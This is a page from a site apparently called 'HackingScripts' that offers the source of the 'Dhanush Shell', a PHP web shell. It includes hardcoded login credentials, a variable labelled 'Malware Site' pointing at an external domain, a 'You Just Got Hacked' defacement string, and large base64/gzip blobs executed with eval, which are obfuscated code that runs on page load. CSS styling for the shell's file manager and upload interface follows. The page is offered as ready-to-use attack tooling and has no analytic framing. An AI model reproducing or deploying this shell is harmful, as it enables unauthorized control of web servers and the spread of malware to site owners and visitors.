HackingScripts

Hack Scripts for everybody

Dhanush Shell

12 Feb 2014

Dhanush Shell. Coded By Arjun. An Indian Hacker.

Dhanush Shell Source Code (encrypted)

  1 <?php
  2 //========================================//
  3 //========+++Dhanush+++==========//
  4 //========================================//
  5 //====+++Coded By Arjun+++===//
  6 //========================================//
  7 //=====+++An Indian Hacker+++=====//
  8 //========================================//
  9 
 10 // Set Username & Password
 11 $user = "Dhanush";
 12 $pass = "Dhanush";
 13 
 14 $malsite = "http://fightagent.ru";  // Malware Site
 15 
 16 $ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // Base64 encoded "You Just Got Hacked !!"
 17 
 18 $bhrt = "eNqVVF1v2zYUfXaA/IdbQoCkwnYGDO1DPbdLHXUJ5tVF4rUoXIOgJTJmJ5EKSc3NBv/38ct24uRlL/q495xzeS4v+cu7dt3Cr5oa3JBbXuK7ThqqseqE4Q3NfspHpydyhbUhymTuhyolFVa0lcpwcRsQXsARcM0bbmKQC45tIksb8gPTH7TsDJfC49L+EUR2pu0MXnWMUWV1I+D05OwMLrqmhQtiyIpo6mKcZQn+rZgvECmdJFrCeAyosriL9yg/Pfn39KSXaFqzcYJviuvPxfUCfbr8ZL+nH9DS6vasBNeucoIns9nvV8UirVaaqr+pSpe5leg5jV5SEUNhDO6Voa+DZlAhty6XiXCb3WugXTAUcaBOP4G40AHQEq2PAC50AAjSUA9wjtPwn8Zsc6/v6ksiqtpB/B8upRC0NJDtl9iHuBD/4dSDBy/BuOci1+VBLDfwvtFj0PgZyNAWDLCEtVaFyZaKzMP7aIMOZVgn/FbBRnHbSkcmObiM73PvtpYrUoNV8RTPsayIZm0/MA7JrXv8X8MBbwfDwnG1yqKXuKN2wGqq932866i6hwzdXM6+wPz8/bS4iYY2a9ezLOF7LKOmXGOiFLnPok7+0J6HJnyRzn0Oc4HTYawetrKXlIqGYXsq+cyCJtfF+bwI6wI0THgemxNbFtQW6SSo+rrpcohG38Q3EX3YM3JXP/VbTIvJHF7Ch+vZH0E6oDmDuBLRNVjJjc6cQDQane6bY/NHXmzkEWHH6DFpF1muI4loSL7D+C0kf+2Ae2TPIRbJ96Wb2BQNgzzVJWmpvaTczZFZ2tDmRpGyje/QF3T10V4Ic7j6OJ/ZDYHP59M/i5sMDXnT1rKygD6yQ2OrWJF8tGtUVNnuJ8/PdFlL7ayy9jDoa0oqqjI0kcJQYQYXXLdSczf7b4AYY302Nj4Cd0bc9o8RDMGfmHwEAM9pzO9basltW/OSOKWzSm5ELcnuMjomTKm4Nes34KSdsub/0HAq45SwutPr7OEtcHx6AanH0/6CUcm81/ww17RcS2B29yp/SOH1q1c/v449e1hjC4eGhX65gO3k1t3n797+B7NU0WA="; eval("?>".gzuncompress(base64_decode($bhrt))); ?>
 19 
 20 <style type="text/css">
 21 <!--
 22 span.headtitle
 23 { 
 24     color:#000000;
 25     text-decoration:none;
 26     
 27 }
 28 div.logindiv
 29 {
 30 background-color:#CCC;
 31 width:50%;
 32 border-radius:7px;
 33 margin-top:150px;
 34 -moz-border-radius:25px;
 35 height:410px;
 36 border: solid 1px 
 37 #878787;
 38 border-radius: 13px;
 39 box-shadow: 0px 0px 10px 
 40 black;
 41 }
 42 body,td,th {
 43     color: #000000;
 44     font-size: 14px;
 45 }
 46 table.pwdtbl
 47 {
 48     width:95%;
 49     background-color:#999999;
 50     -moz-border-radius:25px;
 51     border-radius:25px;
 52 }
 53 tr.file:hover
 54 {
 55 background-color:#C0C0C0;
 56 }
 57 tr.file
 58 {
 59     background-color:#999999;
 60     height:12px;
 61 }
 62 td.myfun
 63 {
 64   display: inline;
 65   padding: 1px;
 66   margin: 5px;
 67   border: 1px solid #AAA;
 68   border-radius: 4px;
 69   -moz-border-radius:4px;
 70   box-shadow: 0px 0px 2px #000;
 71 }
 72 td.myfun:hover
 73 {
 74   box-shadow: 0px 0px 2px #FF0;
 75 }
 76 input.but {
 77     border: 1px solid #787878;
 78     border-radius: 5px;
 79     box-shadow: 0px 0px 2px #000 inset;
 80 }
 81 a:link {
 82     color: #000000;
 83     text-decoration:none;
 84     font-weight:600;
 85 }
 86 a:hover {
 87     color:#666666;
 88     text-decoration:underline;
 89 }
 90 font.txt
 91 {
 92     color: #000000;
 93     text-decoration:none;
 94     font-size:12px;
 95 }
 96 font.fun
 97 {
 98     color: #696969;
 99 }
100 font.wrtperm
101 {
102     color:#000000;
103 }
104 font.readperm
105 {
106     color:#000000;
107 }
108 font.noperm
109 {
110     color:#000000;
111 }
112 input.upld
113 {
114     border: 1px solid #787878; 
115     box-shadow: 0px 0px 3px #000 inset;
116     background-color: #AAA;
117     font-family: Courier;
118     -moz-border-radius:6px;
119     width:400;
120     border-radius:6px;
121 }
122 input.box
123 {
124     border: 1px solid #787878; 
125     box-shadow: 0px 0px 3px #000 inset;
126     background-color: #AAA;
127     font-family: Courier;
128     -moz-border-radius:6px;
129     width:400;
130     border-radius:6px;
131 }
132 input.sbox
133 {
134     border: 1px solid #787878; 
135     box-shadow: 0px 0px 3px #000 inset;
136     background-color: #AAA;
137     font-family: Courier;
138     -moz-border-radius:6px;
139     width:180;
140     border-radius:6px;
141 }
142 select.sbox
143 {
144     border: 1px solid #787878; 
145     box-shadow: 0px 0px 3px #000 inset;
146     background-color: #AAA;
147     font-family: Courier;
148     -moz-border-radius:6px;
149     width:180;
150     border-radius:6px;
151 }
152 select.box
153 {
154     border: 1px solid #787878; 
155     box-shadow: 0px 0px 3px #000 inset;
156     background-color: #AAA;
157     font-family: Courier;
158     -moz-border-radius:6px;
159     width:400;
160     border-radius:6px;
161 }
162 
163 textarea.box
164 {
165     border: 1px solid #787878;
166     margin-top: 10px;
167     -moz-border-radius:7px;
168     box-shadow: 0px 0px 3px #000 inset;
169     background-color: #AAA;
170 }
171 textarea:focus
172 {
173   box-shadow: 0px 0px 3px #FF0 inset;
174 }
175 body {
176     background-color:#C0C0C0;
177 }
178 .myphp table
179 { 
180     width:100%;
181     padding:18px 10px;
182     border : 1px solid #1B1B1B;
183 } 
184 .myphp td
185 { 
186     /*background:#111111; */
187     color:#000000; 
188     padding:6px 8px; 
189     border-bottom:1px solid #222222;
190     font-size:14px; 
191 } 
192 .myphp th, th
193 { 
194     background:#999999;
195     
196 } 
197 -->
198 </style>
199 <?php
200 
201 $bhart = "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